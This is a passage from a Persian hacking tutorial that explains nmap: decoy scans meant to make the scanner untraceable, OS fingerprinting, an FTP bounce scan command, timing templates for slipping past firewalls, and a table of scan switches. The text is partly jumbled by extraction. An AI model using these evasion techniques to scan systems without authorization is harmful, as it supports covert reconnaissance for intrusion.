‫ﺧﻮب یﮑﯽ از ویﮋﮔﯽ هﺎی ﺧﻮب ‪ nmap‬ﻣﮑﺎﻧﻴﺰم رد ﮔ ﻢ ﮐﻨ ﯽ ﺧ ﺎص ﺧ ﻮد اﺱ ﺖ ﮐ ﻪ ﺟ ﺪا از ﻣﮑ ﺎﻧﻴﺰم ه ﺎی ﭘ ﻮیﺶ ﻣﺨﻔ ﯽ ﭘ ﻮرت اﺱ ﺖ‪ .‬ای ﻦ روش‬ ‫راﺏﻄﻪ ﻣﺴﺘﻘﻴﻤﯽ ﺏﺎ ﭘﻬﻨﺎی ﺏﺎﻧﺪ ارﺕﺒﺎﻃﯽ ﺷﻤﺎ ﺏﺎ ﺷﺒﮑﻪ دارد‪ .‬ﻣﮑ ﺎﻧﻴﺰم ای ﻦ روش ای ﻦ اﺱ ﺖ ﮐ ﻪ ﺏ ﺮای ه ﺮ ﭘ ﻮرت از ﻣﺎﺷ ﻴﻦ ه ﺪف ﺏ ﻴﺶ از ی ﮏ ﺏ ﺴﺘﻪ‬ ‫ﻓﺮﺱﺘﺎدﻩ ﻣﻴﺸﻮد ﮐﻪ ﻓﻘﻂ در ﻓﻴﻠﺪ ‪ IP‬ﻓﺮ ﺱﻨﺪﻩ ﺏﺎ هﻢ ﺕﻔﺎوت دارﻧﺪ ﺏﻪ ایﻦ ﺻ ﻮرت ﮐ ﻪ ﻣﺎﺷ ﻴﻦ ﻗﺮﺏ ﺎﻧﯽ ﻣ ﺜﻼ ﺏ ﺎ دریﺎﻓ ﺖ ‪ ۴‬ﺏ ﺴﺘﻪ در ﺟ ﻮاب ﭼﻬ ﺎر ﺏ ﺴﺘﻪ‬ ‫ﻣﻴﻔﺮﺱﺘﺪ اﻣﺎ ﻓﻘﻂ یﮑﯽ از ان ﺏﺴﺘﻪ هﺎ ﺁدرس ﻣﺎﺷﻴﻦ ﭘﻮیﺸﮕﺮ ﭘﻮرت را دارد و ﺏﻘﻴﻪ ﺁدرﺱﻬﺎی ﺏﻴﮕﻨﺎﻩ و ﺏﻴﺨﺒﺮ هﺴﺘﻨﺪ ﮐ ﻪ ﺏﻌ ﺪ از دریﺎﻓ ﺖ ای ﻦ ﺏ ﺴﺘﻪ ﺁن‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٣١‬‬

‫را ﺡﺬف ﻣﻴﮑﻨﺪ ‪.‬ﺧﻮب اﮔﺮ ﺷﻤﺎ ﺏﻪ ﺟﺎی ‪ ۴‬ﺏﺴﺘﻪ ‪ ٣٠‬ﺏﺴﺘﻪ ﺏﻔﺮﺱﺘﻴﺪ ﭼﻪ ﻣﻴﺸﻮد هﻴﭽﯽ ﻓﻘ ﻂ ﮐ ﺎر ﻣ ﺴﻠﻮل اﻣﻨﻴ ﺖ ﺱ ﺎیﺖ ‪ ٣٠‬ﺏﺮاﺏ ﺮ ﻣﻴ ﺸﻮد و ﻋﻤ ﻼ ﺷ ﻤﺎ‬ ‫ﻏﻴﺮ ﻗﺎﺏﻞ رد یﺎﺏﯽ ﻣﻴﺸﻮیﺪ‪.‬‬ ‫یﮑﯽ از ﻗﺎﺏﻠﻴﺘﻬﺎی ایﻦ ﺏﺮﻧﺎﻣﻪ ﭘﻮیﺶ هﻢ زﻣﺎن ﭼﻨﺪ ﻗﺮﺏﺎﻧﯽ اﺱﺖ ﮐﻪ ﺏﻌﺪا ﺏﻴﺸﺘﺮ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ‪.‬‬ ‫یﮑﯽ دیﮕﺮ از ویﮋﮔﯽ هﺎی ‪ nmap‬ﮐﻪ ﺁن را از دیﮕﺮ ﻧﺮم اﻓﺰار هﺎی ﻣﺸﺎﺏﻪ ﺧﻮد ﻣﺘﻤﺎیﺰ ﻣﯽ ﮐﻨﺪ ﺕﺸﺨﻴﺺ ﻧ ﻮع ﺱﻴ ﺴﺘﻢ ﻋﺎﻣ ﻞ اﺱ ﺖ اﻟﺒﺘ ﻪ راﻩ ه ﺎی‬ ‫زیﺎدی هﻤﭽﻮن ‪ ping‬و ﺕﻮﺟﻪ ﺏﻪ ﭘﺎراﻣﺘﺮ ‪ TTL‬اﺱﺖ‪ .‬اﻟﺒﺘﻪ ‪ nmap‬از ایﻦ روش اﺱﺘﻔﺎدﻩ ﻧﻤﯽ ﮐﻨﺪ‪ .‬روش ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﺮای ﺕﺸﺨﻴﺺ ‪ OS‬ﺏﺮ ﻣﺒﻨ ﺎی‬ ‫ﻧﻘﺾ اﺻﻮل ﭘﺮوﺕﮑﻞ اﺱﺖ ﻣﺜﻼ هﺮ ﮔﺎﻩ یﮏ دﻓﻌﻪ ی ﮏ ﺏ ﺴﺘﻪ ‪ ACK‬ﺏ ﻪ ﺱ ﻮی ویﻨ ﺪوز ﺡﻮاﻟ ﻪ ﺷ ﻮد ) هﻤ ﺎﻧﻄﻮر ﮐ ﻪ ﻣ ﯽ داﻧﻴ ﺪ ه ﻴﭻ وﻗ ﺖ ی ﮏ ﺏ ﺴﺘﻪ‬ ‫‪ ACK‬یﮏ دﻓﻌﻪ ﺡﻮاﻟﻪ هﻴﭻ ﻣﺎﺷﻴﻨﯽ ﻧﻤﯽ ﺷﻮد ( در ﺟﻮاب یﮏ ﺏﺴﺘﻪ ‪ RESET‬ﺏ ﺮ ﻣ ﯽ ﮔ ﺮدد‪ .‬ﺏ ﺴﺘﻪ ه ﺎیﯽ ﮐ ﻪ ای ﻦ ﻧ ﺮم اﻓ ﺰار ﻣﻴﻔﺮﺱ ﺘﺪ ی ﮏ دﻓﻌ ﻪ‬ ‫ﻋﺒﺎرﺕﻨ ﺪ از ‪ SYS‬و ‪ ) NULL‬ﺏ ﺴﺘﻪ ‪ NULL‬ﺏ ﺴﺘﻪ ای ﺏ ﺪون ‪ CODE BIT‬اﺱ ﺖ ( و ‪ ACK‬و ‪ ) SYN‬ﺏ ﻪ ﺱ ﻮی ﭘ ﻮرت ه ﺎ ﺏ ﺴﺘﻪ ﻣﻴﻔﺮﺱ ﺘﺪ( و‬ ‫‪ ACK‬و ‪ UDP‬و ) ‪ PSH‬و ‪ URG‬و ‪ FIN‬ﺏﺴﻮی ﭘﻮرت هﺎی ﺏﺴﺘﻪ ( و ‪ PSH‬و ‪ URG‬و …‬ ‫ﺧﻮب ‪ nmap‬یﮏ ‪ ،‬دو ﺟﻴﻦ از ﺟﻮاب هﺎی دریﺎﻓﺘﯽ هﺮ ﺱﻴﺴﺘﻢ ﻋﺎﻣﻞ را دارد و ﺏﺎ دریﺎﻓﺖ ﺟﻮاب ﭘﯽ ﺏﻪ ﻧﻮع ‪ OS‬ﻣﯽ ﺏﺮد‪.‬‬ ‫ﮐﺪ ﻣﻨﺒﻊ ﺏﺮای ﻧﺴﺨﻪ ویﻨﺪوز ﻧﺮم اﻓﺰار ‪ Win nmap‬را ﻣﻴﺘﻮاﻧﻴﺪ از ﺁدرس زیﺮ ﺏﺪﺱﺖ ﺏﯽ ﺁوریﺪ ‪:‬‬ ‫‪http://nmapwin.sourceforge.com/projects/nmapwin‬‬ ‫اﻟﺒﺘﻪ یﮏ ﮐﻤﯽ ﻓﮑﺮ ﮐﻨﻢ اﻧﮕﻮﻟﮏ ﮐﻨﻴﺪ ﺁن را‪ ،‬ﺕﻮ ویﻨﺪوز ‪ XP‬ﺏﺎ ﺱﺮویﺲ ﭘﮏ هﻢ ﮐﺎر ﮐﻨﺪ وﻟﯽ ﻣﻦ ﮐﺮدم ﻧﺼﻒ ﻗﺎﺏﻠﻴﺖ هﺎی ﺁن ﭘﺮی ﺪ !!! دارم روش‬ ‫ﮐﺎر ﻣﻴﮑﻨﻢ !!!!!‬ ‫از ‪ nmap‬ﻣﻴﺸﻮد ﺏﺮای اﺕﺼﺎل ﺏﻪ یﮏ ﭘﻮرت اﺱﺘﻔﺎدﻩ ﮐﺮد ﺏﺎ ﺷﮑﻞ ﻋﻤﻮﻣﯽ زیﺮ ‪:‬‬ ‫>‪Nmap –PT <port_number‬‬ ‫ﺧﻮب از ایﻦ دﺱﺘﻮر ‪ nmap‬در ﻣﻮاﻗﻌﯽ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻢ ﮐﻪ ﻣﺜﻼ ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ اﻣﮑﺎﻧﺎت ﺁن یﮏ رﻧﺞ ‪ IP‬را ﺏﺮای ﺏﺎﻻ ﺏﻮدن ﻣﺎﺷ ﻴﻦ ه ﺎ ﮔ ﺸﺘﻪ ام وﻟ ﯽ ﺏ ﻪ‬ ‫ﺟﻮاﺏﻬﺎ ﺧﻴﻠﯽ ﺷﮏ دارم ﺁن هﺎیﯽ را ﮐﻪ اﺡﺘﻤﺎل ﻣﯽ دهﻢ ‪ ،‬در ﺧﻮاﺱﺖ ﻣﻦ دیﻮار ﺁﺕﺶ ﺱﻮزاﻧﺪﻩ ﺏﺎ ایﻦ دﺱ ﺘﻮر ﭼ ﮏ ﻣﻴﮑ ﻨﻢ و ﻣﻌﻤ ﻮﻻ از ﭘ ﻮرت ‪٨٠‬‬ ‫هﻢ اﺱﺘﻔﺎدﻩ ﻣﻴﮑﻨﻢ‪.‬‬ ‫یﮏ ﻧﻤﻮﻧﻪ از دﺱﺘﻮر ‪ nmap‬ﺏﺎ ﻣﮑﺎﻧﻴﺰم ‪ FTP Bounce‬را در زیﺮ ﺁوردﻩ ام ﮐﻪ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ‪:‬‬ ‫‪Nmap –b [email protected]_host.com –p 6000 xxx.xxx.xxx.xxx‬‬ ‫ﻓﺮﻣﺎن ﺏﺎﻻ ﺱﻌﯽ ﻣﻴﮑﻨﺪ ﺏﺎ ﺏﻬﺮﻩ ﮔﻴﺮی از ﺱﺮور ‪ ftp.lame_host.com‬ﭘ ﻮرت ‪ ۶٠٠٠‬از ﻣﻴﺰﺏ ﺎﻧﯽ ﺏ ﻪ ﺁدرس ‪ xxx.xxx.xxx.xxx‬را ﺟﻬ ﺖ ﭘ ﯽ‬ ‫ﺏﺮدن ﺏﻪ ایﻦ ﻣﻄﻠﺐ ﮐﻪ ﺁیﺎ ﻣﻴﺰﺏﺎن ﻣﺬﮐﻮر در ﺡﺎل اﺟﺮای ﺱﺮویﺲ ‪ ) X‬هﻤﺎن ‪ X Windows‬ﻟﻴﻨﻮﮐﺲ (اﺱﺖ یﺎ ﺧﻴﺮ ‪.‬‬ ‫ﺏﻌﺪ یﮏ ﺱﺮی ﮐﺎرهﺎ ﺧﻮد ﺏﺮﻧﺎﻣﻪ اﻧﺠﺎم ﻣﻴﺪهﺪ ‪ .‬ﺏﻌﺪ ﺟﻮاب را ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ‪.‬‬ ‫ایﻦ ﺏﺮﻧﺎﻣﻪ ﺏﺮای زﻣﺎن ﺏﻨﺪی ﻋﻤﻞ ﭘﻮیﺶ ﭘﻮرت اﻣﮑﺎﻧﺎت ﺧﻮﺏﯽ را در اﺧﺘﻴﺎر ﻣﺎ ﻗﺮار ﻣﯽ دهﺪ ﮐﻪ اﻟﺒﺘﻪ ﺏﻴ ﺸﺘﺮ در ﺕﻤ ﺎم ﻣﻘ ﺎﻻﺕﯽ و ﺁﻣﻮزﺷ ﻬﺎ ﮐ ﻪ در‬ ‫ﺏﺎرﻩ ایﻦ ﺏﺮﻧﺎﻣﻪ ﻧﻮﺷﺘﻪ ﺷﺪﻩ اﺱﺖ در ﺡ ﻖ ای ﻦ ﮔﺰیﻨ ﻪ ﻣ ﺎﻓﻮق ﻣﻬ ﻢ اﺟﺤ ﺎف ﺷ ﺪﻩ اﺱ ﺖ زی ﺮا ﺏﻴ ﺸﺘﺮ دی ﻮار ﺁﺕ ﺶ ه ﺎ ﮐ ﻪ ﻗﻴﻤ ﺖ ﻣﺘﻮﺱ ﻄﯽ دارﻧ ﺪ و ﻧ ﺮم‬ ‫اﻓﺰاری هﺴﺘﻨﺪ هﻤﻪ از اﻟﮕﻮی زﻣﺎن ﺏﻨﺪی ﺕﻬﺎﺟﻢ را ﭘﺸﺘﻴﺒﺎﻧﯽ ﻣﻴﮑﻨﺪ از ﺟﻤﻠﻪ ﻣﺤﺼﻮﻻت ‪ semantic‬و ‪ MacAfee‬و‪...‬‬ ‫ﮐﻪ ﮐﺎر ایﻦ اﻟﮕﻮ ﺏﺎﻋﺚ ﻣﻴﺸﻮد ﮐﻪ اﻧﻮاع اﺱ ﮑﻦ ﻏﻴ ﺮ ﻣﺨﻔ ﯽ ﺷ ﻤﺎ دود ﺏ ﺸﻮد و ﺏ ﺮود ه ﻮا و در ﺏﻌ ﻀﯽ ﻣﻮاﻗ ﻊ ه ﻢ ﻣ ﺪهﺎی ﻣﺨﻔ ﯽ ﺁن از ﺟﻤﻠ ﻪ ‪FTP‬‬ ‫‪ Bounce‬ﭼﻮن ﺷﻤﺎ داریﺪ ﭘﺸﺖ ﺱﺮ هﻢ ﺏﻪ ﻃﺮف ﺏﺴﺘﻪ ﻣﻴﺪهﻴﺪ ‪.‬‬ ‫ﺡﺎل ﮐﻪ اهﻤﻴﺖ ایﻦ ﻣﻮﺽﻮع ﭘﯽ ﺏﺮدیﺪ در ﺟﺪول زیﺮ اﻟﮕﻮهﺎی زﻣﺎن ﺏﻨﺪی ﻗﺎﺏﻞ اﺱﺘﻔﺎدﻩ در ﺏﺮﻧﺎﻣﻪ ‪ Nmap‬را ﻣﺸﺎهﺪﻩ ﻣﻴﮑﻨﻴﺪ‪:‬‬ ‫ﻧﺎم اﻟﮕﻮ‬

‫ﻓﻮاﺻﻞ زﻣﺎﻧﯽ‬

‫زﻣﺎن ﺻﺮف ﺷﺪﻩ ﺏﺮای‬ ‫اﺱﮑﻦ هﺮ ﻣﻴﺰﺏﺎن‬

‫‪Paranoid‬‬ ‫‪Sneaky‬‬ ‫‪Polite‬‬

‫‪ ۵‬دﻗﻴﻘﻪ‬ ‫‪ ١۵‬ﺙﺎﻧﻴﻪ‬ ‫‪ ۴‬ﺙﺎﻧﻴﻪ‬

‫ﻧﺎﻣﺤﺪود‬ ‫ﻧﺎﻣﺤﺪود‬ ‫ﻧﺎﻣﺤﺪود‬

‫‪Normal‬‬

‫‪-‬‬

‫ﻧﺎﻣﺤﺪود‬

‫‪Aggressive‬‬

‫‪-‬‬

‫‪ ۵‬دﻗﻴﻘﻪ‬

‫‪Insane‬‬ ‫اﻟﮕﻮی ﺕﻌﺮیﻔﯽ ﺕﻮﺱﻂ‬ ‫ﮐﺎرﺏﺮ‬

‫‬‫‪Scan_delay‬‬

‫‪ ٧۵‬ﺙﺎﻧﻴﻪ‬ ‫‪Host_timeout‬‬

‫زﻣﺎن ﻣﺠﺎز ﺏﺮای‬ ‫دریﺎﻓﺖ ﭘﺎﺱﺦ ﻣﻮرد ﻧﻈﺮ‬ ‫از ﻣﻴﺰﺏﺎن‬ ‫‪ ۵‬دﻗﻴﻘﻪ‬ ‫‪ ١۵‬ﺙﺎﻧﻴﻪ‬ ‫‪ ۶‬ﺙﺎﻧﻴﻪ )ﺡﺪاﮐﺜﺮ ‪١٠‬‬ ‫ﺙﺎﻧﻴﻪ (‬ ‫‪ ۶‬ﺙﺎﻧﻴﻪ )ﺡﺪاﮐﺜﺮ ‪١٠‬‬ ‫ﺙﺎﻧﻴﻪ (‬ ‫یﮏ ﺙﺎﻧﻴﻪ ) ﺡﺪاﮐﺜﺮ ‪۵٫١‬‬ ‫ﺙﺎﻧﻴﻪ (‬ ‫ﺡﺪاﮐﺜﺮ ‪ ٣‬ﺙﺎﻧﻴﻪ‬ ‫‪Initial_rtt_timeout‬‬ ‫‪Min_rtt_timeout‬‬ ‫‪Max_rrt_timeout‬‬

‫ﭘﻮیﺶ ﻣﻮازی ) اﺱﮑﻦ‬ ‫هﻢ زﻣﺎن ﭼﻨﺪ ﻣﻴﺰﺏﺎن (‬ ‫ﺧﻴﺮ‬ ‫ﺧﻴﺮ‬ ‫ﺧﻴﺮ‬ ‫ﺧﻴﺮ‬ ‫ﺏﻠﻪ‬ ‫ﺏﻠﻪ‬ ‫‪Max_parallelism‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪٣٢‬‬

‫ﺕﻤﺎم اﻟﮕﻮهﺎی ﭘﻴﺶ ﺕﻌﺮیﻒ ﺷﺪﻩ را ﻣﻴﺘﻮان ﺏ ﺎ اﺱ ﺘﻔﺎدﻩ از ﮔﺰیﻨ ﻪ ‪ –T‬در اﺧﺘﻴ ﺎر ﮔﺮﻓ ﺖ‪ .‬ﺏ ﺮای ﻧﻤﻮﻧ ﻪ ﺏ ﻪ ﻓﺮﻣ ﺎن زی ﺮ ﺕﻮﺟ ﻪ ﮐﻨﻴ ﺪ ﮐ ﻪ اﻟﮕ ﻮی ﮐﻠ ﯽ را‬ ‫ﻧﻤﺎیﺶ ﻣﻴﺪهﺪ ‪:‬‬ ‫‪Nmap T Sneaky sS xxx.xxx.xxx.xxx p 1-100‬‬ ‫ﺧﻮب ‪ sS‬ﮐﻪ ﻣﮑﺎﻧﻴﺰم ﭘﻮیﺶ اﺱﺖ ‪ T ،‬زﻣﺎن ﺏﻨﺪی را ﻓﻌﺎل ﻣﯽ ﮐﻨﺪ ‪ Sneaky‬هﻢ ﻣﺪل را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ ‪.‬‬ ‫ﺧﻮب ﺷﻤﺎ ﺧﻮدﺕﺎن هﻢ ﻣﯽ ﺕﻮاﻧﻴﺪ یﮏ ﻣﺪل ﺕﻌﺮیﻒ ﮐﻨﻴﺪ ﮐﻪ ‪ Scan_delay‬ﺡﺪاﻗﻞ ﻓﺎﺻﻠﻪ زﻣﺎﻧﯽ ﻣ ﻮرد ﻧﻴ ﺎز ﺏ ﺮ ﺡ ﺴﺐ ﻣﻴﻠ ﯽ ﺙﺎﻧﻴ ﻪ ﺏ ﻪ ﻋﻨ ﻮان ﺕ ﺎﺧﻴﺮ‬ ‫ﻣﻴﺎن اﺱﮑﻦ دو ﻣﻴﺰﺏﺎن ﻣﺨﺘﻠﻒ را ﻣﺸﺨﺺ ﻣﻴﮑﻨﺪ‪ .‬ﮔﺰیﻨﻪ ‪ Host_timeout‬ﺡﺪاﮐﺜﺮ زﻣﺎن ﻗﺎﺏﻞ ﺻﺮف ﺏﺮ ﺡﺴﺐ ﻣﻴﻠﯽ ﺙﺎﻧﻴﻪ را ﺟﻬ ﺖ اﺱ ﮑﻦ ﭘ ﻮرت‬ ‫هﺎی یﮏ ﻣﻴﺰﺏﺎن ﺧﺎص ﺕﻌﻴﻴﻦ ﻣﻴﮑﻨﺪ‪ .‬ﺱﻪ ﮔﺰیﻨﻪ ‪ rtt_timeout‬ﻣﺪت زﻣﺎن اﻧﺘﻈ ﺎر ﺏ ﺮ ﺡ ﺴﺐ ﻣﻴﻠ ﯽ ﺙﺎﻧﻴ ﻪ را ﺟﻬ ﺖ دریﺎﻓ ﺖ ﭘﺎﺱ ﺦ ﻻزم از ﻣﻴﺰﺏ ﺎن‬ ‫ﻣﻮرد ﻧﻈﺮ ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﻨﺪ‪.‬اﻟﺒﺘﻪ ﮐﻤﺘﺮیﻦ زﻣﺎن در ﺏﺮﻧﺎﻣﻪ ‪ nmap‬ﺏﺮای دریﺎﻓﺖ ﭘﺎﺱﺦ ‪ ٣٠٠‬ﻣﻴﻠ ﯽ ﺙﺎﻧﻴ ﻪ اﺱ ﺖ‪ .‬ﮔﺰیﻨ ﻪ ﺁﺧ ﺮ ‪Max_parallelism‬‬ ‫ﺕﻌﺪاد ﭘﻮرت هﺎیﯽ را ﻣﺸﺨﺺ ﻣﯽ ﮐﻨﺪ ﮐﻪ ﺏﻪ ﻃﻮر ﻣﻮازی ) یﺎ هﻢ زﻣﺎن ﺏﻪ ﻋﺒﺎرت دیﮕﺮ ( ﻣﻴﺘﻮان ﭘﻮیﺶ ﻧﻤ ﻮد‪ .‬اﻟﺒﺘ ﻪ اﮔ ﺮ ﻣﻘ ﺪار ‪ ١‬را ﺏ ﻪ ﺁن ﺏﺪهﻴ ﺪ‬ ‫ﮐﻼ ایﻦ ویﮋﮔﯽ را ﻏﻴﺮ ﻓﻌﺎل ﮐﺮدﻩ ایﺪ اﻟﺒﺘﻪ ﻇﺮﻓﻴﺖ ایﻦ ﻣﻘﺪار ﺡﺪاﮐﺜﺮ ‪ ٣۶‬اﺱﺖ‪.‬‬ ‫ﻟﻴﺴﺖ ﺱﻮیﭻ هﺎ ﻋﺒﺎرت اﻧﺪ از ‪:‬‬

‫‪١‬‬ ‫‪٢‬‬ ‫‪٣‬‬

‫‪-sT‬‬ ‫‪-sS‬‬ ‫‪-sF‬‬

‫‪۴‬‬

‫‪-sP‬‬

‫‪Ping Sweep‬‬

‫‪۵‬‬

‫‪-sU‬‬

‫‪UDP Scan‬‬

‫‪۶‬‬

‫‪-sN‬‬

‫‪Null Scan‬‬

‫‪٧‬‬

‫‪-sX‬‬

‫‪Xams Tree‬‬

‫‪٨‬‬

‫‪-sO‬‬

‫‪IP Scan‬‬

‫‪٩‬‬

‫‪-sI‬‬

‫‪Idle Scan‬‬

‫‪١٠‬‬

‫‪-sA‬‬

‫‪ACK Scan‬‬

‫ﻣﮑﺎﻧﻴﺰم ﭘﻮیﺶ ﻣﻮدﺏﺎﻧﻪ اﺱﺖ ﺏﺎﻻ زیﺎد ﺕﻮﺽﻴﺢ دادم !!‬ ‫ﻣﮑﺎﻧﻴﺰم ﭘﻮیﺶ ﻣﺨﻔﻴﺎﻧﻪ اﺱﺖ‪.‬‬ ‫ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ ‪ TCP FIN‬ارﺱﺎل ﻣﻴﺸﻮد‪ .‬اﮔﺮ‬ ‫‪ RESET‬ﺏﺮﮔﺮدد ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ‪ ،‬در ﻏﻴﺮ ایﻦ‬ ‫ﺻﻮرت اﺡﺘﻤﺎﻻ ﺏﺎز اﺱﺖ ‪.‬‬ ‫ﻣﮑﺎﻧﻴﺰم ﮐﺸﻒ یﮏ ﻣﺎﺷﻴﻦ در ﺷﺒﮑﻪ ﺏﺎ اﺱﺘﻔﺎدﻩ از ﭘﻴﻐﺎم‬ ‫‪. ICMP‬‬ ‫ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ ‪ UDP‬ارﺱﺎل ﻣﻴﺸﻮد‪ .‬اﮔﺮ‬ ‫‪ RESET‬یﺎ ﭘﻴﻐﺎم ‪ ICMP‬ﺏﺮﮔﺮدد ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ‪،‬‬ ‫در ﻏﻴﺮ ایﻦ ﺻﻮرت اﺡﺘﻤﺎﻻ ﺏﺎز اﺱﺖ ‪.‬‬ ‫ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ ارﺱﺎل ﻣﯽ ﺷﻮد ﮐﻪ در ﺁن هﻴﭻ‬ ‫یﮏ از ﺏﻴﺘﻬﺎی ﮐﻨﺘﺮﻟﯽ ) ﻣﺜﻞ ‪ ACK‬و ‪ FIN‬و ‪( ...‬‬ ‫ﻓﻌﺎل ﻧﻴﺴﺖ‪ .‬اﮔﺮ ‪ RESET‬ﺏﺮﮔﺮدد ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ‪،‬‬ ‫در ﻏﻴﺮ ایﻦ ﺻﻮرت اﺡﺘﻤﺎﻻ ﺏﺎز اﺱﺖ ‪.‬‬ ‫ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ ‪ TCP‬ﺏﺎ ﺏﻴﺘﻬﺎی ﻓﻌﺎل ‪ FIN‬و‬ ‫‪ URG‬و ‪ PUSH‬ارﺱﺎل ﻣﻴﺸﻮد‪ .‬اﮔﺮ ‪RESET‬‬ ‫ﺏﺮﮔﺮدد ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ‪ ،‬در ﻏﻴﺮ ایﻦ ﺻﻮرت اﺡﺘﻤﺎﻻ‬ ‫ﺏﺎز اﺱﺖ ‪.‬‬ ‫ﺏﺮای اﺱﮑﻦ ﭘﺮوﺕﮑﻞ اﺱﺖ‪.‬یﻌﻨﯽ ایﻨﮑﻪ ﺏﺒﻴﻨﻴﻢ ﺁیﺎ ﭘﺮوﺕﮑﻞ‬ ‫ﻣﻮرد ﻧﻈﺮ روی ﻣﺎﺷﻴﻦ هﺪف هﺴﺖ یﺎ ﮐﻪ ﺧﻴﺮ‪ .‬ﻣﺜﻼ ﺏﺎ‬ ‫ارﺱﺎل یﮏ ﺏﺴﺘﻪ ‪ IP‬ﺧﺎم ) هﺪر ﻣﺪر ﻧﺪارد ﺧﺎﻟﯽ اﺱﺖ‬ ‫ایﻦ ﻓﻴﻠﺪ (ﺏﺎ ﺷﻨﺎﺱﻪ ‪١٣٠‬ﻣﻴﺘﻮاﻧﻴﻢ ﺏﺒﻴﻨﻴﻢ ﺁیﺎ ﭘﺮوﺕﮑﻞ ‪SPS‬‬ ‫)‪ (Secure Packet Shield‬ﺁیﺎ روی ﻣﺎﺷﻴﻦ هﺴﺖ یﺎ‬ ‫ﻧﻪ‪ .‬اﮔﺮ در ﺟﻮاب یﮏ ﺏﺴﺘﻪ ‪ ICMP‬ﺏﺎ ﻣﺤﺘﻮای‬ ‫‪ protocol unreachable‬ﺏﮕﻴﺮیﻢ ﻣﻴﺸﻮد ﮔﻔﺖ ایﻦ‬ ‫ﭘﺮوﺕﮑﻞ روی ﻣﺎﺷﻴﻦ هﺪف ﻧﺼﺐ ﻧﺸﺪﻩ اﺱﺖ ‪ .‬اﮔﺮ‬ ‫ﺟﻮاب ﺏﻪ ﻣﺎ ﻧﺪهﺪ ﻣﻴﺸﻮد ﮔﻔﺖ ﮐﻪ ایﻦ ﭘﺮوﺕﮑﻞ روی‬ ‫ﻣﺎﺷﻴﻦ هﺴﺖ‪ .‬ایﻦ را ذﮐﺮ ﮐﻨﻢ ﮐﻪ ایﻦ ﺷﻴﻮﻩ ‪ ،‬ﺷﻴﻮﻩ ﮐﺎر‬ ‫درﺱﺘﯽ اﺱﺖ!!‬ ‫ﺏﺮای اﺱﮑﻦ ﻣﻴﺰﺏﺎن هﺎیﯽ اﺱﺖ ﮐﻪ از ﺱﺮویﺲ ‪Identd‬‬ ‫ﮐﻪ ﺏﻪ ﺻﻮرت ﺏﻴﺶ ﻓﺮض روی ﭘﻮرت ‪ ١١٣‬ﻓﺎل ﮔﻮش‬ ‫ﻣﯽ ﻣﺎﻧﻨﺪ اﺱﺖ اﻃﻼﻋﺎت ﺕﮑﻤﻴﻠﯽ از ﺟﻤﻠﻪ ﻟﻴﺴﺖ‬ ‫ﮐﺎرﺏﺮان و‪ ..‬را ﺏﺪﺱﺖ ﻣﯽ ﺁورد‪.‬‬ ‫ﺏﻪ هﺮ ﭘﻮرت یﮏ ﺏﺴﺘﻪ ‪ TCP ACK‬ارﺱﺎل ﻣﯽ ﺷﻮد‪.‬‬ ‫اﮔﺮ ‪ RESET‬ﺏﺮﮔﺮدد ﭘﻮرت ﺏﺴﺘﻪ اﺱﺖ‪ ،‬در ﻏﻴﺮ ایﻦ‬

‫ﻗﺴﻤﺖ ‪ Scan‬ﺏﺨﺶ ‪ Mode‬یﺎ ‪Type‬‬

‫ﺱﻮیﭻ‬

‫ﻧﺎم ﺱﻮیﭻ در‬ ‫‪NMapWin‬‬ ‫‪Connect‬‬ ‫‪SYS Stealth‬‬ ‫‪FIN Stealth‬‬

‫ﺕﻮﺽﻴﺤﺎت ﺱﻮیﭻ هﺎ‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫‪١٢‬‬

‫‪-sR‬‬

‫‪RCP Scan‬‬

‫‪١٣‬‬

‫‪-sL‬‬

‫‪List Scan‬‬

‫‪١۴‬‬

‫}‪-p {x-x‬‬

‫‪Port Range‬‬

‫‪١۵‬‬

‫}‪-D {x-x‬‬

‫‪Use Decoy‬‬

‫‪١۶‬‬

‫}‪-b {x-x‬‬

‫‪Bounce Scan‬‬

‫‪١٧‬‬

‫}‪-e {x‬‬

‫‪Device‬‬

‫‪١٨‬‬

‫}‪-S {x‬‬

‫‪Source Address‬‬

